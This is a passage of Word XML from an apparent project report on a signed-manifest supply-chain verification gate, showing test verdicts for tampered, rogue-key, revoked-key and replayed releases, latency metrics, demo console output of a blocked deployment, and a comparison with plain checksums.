            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HASH_MISMATCH: expected df75af21…20efd7, computed 26dd3955…0ab4a5</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Scenario 3A: rogue attacker key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY: signer "Attacker Impersonator" not trusted</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Scenario 3B: revoked (leaked) vendor key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signer refused (SIGNING_BLOCKED); verifier REVOKED</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Replay / downgrade (Test 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version 0.8.0 is on the revoked-versions list</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CI gate, legitimate release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ALLOWED / DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exit code 0, status PASS (1.16 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI gate, tampered release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED / ABORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exit code 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.4 Performance and Reliability Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Measured results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5443"/>
        <w:gridCol w:w="3515"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5443"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Result</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Test cases passing expected verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9 / 9 (100 %)</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Attack / tamper detection rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7 / 7 (100 %)</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False acceptance rate (target 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0 / 7 (0.00 %)</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False rejection of legitimate releases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0 / 2</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Mean verification latency (nine tests)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.89 ms (validation run, Python 3.11)</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Single verification in the live demo / CI gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0.61 ms / 1.16 ms</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Verification adds only milliseconds, which is negligible compared with a CI job that takes minutes. Mandatory verification on every run is therefore practical. Exact timings vary by machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.5 Live Demonstration and Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>demo.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> follows the 14-step protocol. It explains the attack and shows the architecture. It then displays the legitimate artifact, generates its SHA-256 digest and Ed25519 signature, and verifies it (PASS). Next it adds an exfiltration line and verifies again, showing the SHA-256 mismatch and the gate blocking deployment. Finally it shows the audit log, demonstrates key revocation, restores the artifact and shows PASS again. The tampered-artifact stage of our run printed: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6"/>
        </w:rPr>
        <w:t>[STEP 9/14] DETECTING CRYPTOGRAPHIC INCONSISTENCIES</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[!] Manifest Stated SHA-256: df75af217693138c87998f1a52624226eb6c96b59b22bd9b91b911a1bf20efd7</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[!] Recalculated SHA-256:    702d3514408aaabcc8a0b8c33d7c5bb66bff5dbf958fc9b60bad71ee26c3fdbb</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[STEP 10/14] INTEGRITY &amp; SIGNATURE FAILURE ANALYSIS</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[!] Gate Status Code: HASH_MISMATCH</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[STEP 11/14] CI/CD ZERO-TRUST SECURITY GATE ACTION</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> [GATE ENFORCEMENT: DEPLOYMENT BLOCKED]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supply-chain integrity breached. Execution halted with exit code 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3555000"/>
            <wp:docPr id="7" name="Picture 7"/>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688000" cy="3555000"/>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7.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Flask dashboard: KPIs, audit trail, revocation list and live verifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INNOVATION AND APPLICATION RELEVANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.1 Beyond a Basic Hash Checker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 8.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Comparison with a checksum-based approach</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="3515"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Published checksum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Our system</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Detects a modified artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Only if checked, and only if the checksum is authentic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Always: SHA-256 inside an Ed25519-signed manifest</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Survives a compromised storage bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No: checksum can be replaced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes: attacker cannot sign</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Rejects unknown or rogue signers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes: trusted signers and allowed key IDs</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Handles leaked keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes: key revocation list checked by signer and verifier</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Blocks replay of vulnerable versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes: revoked versions and minimum version</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Ties the release to its build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
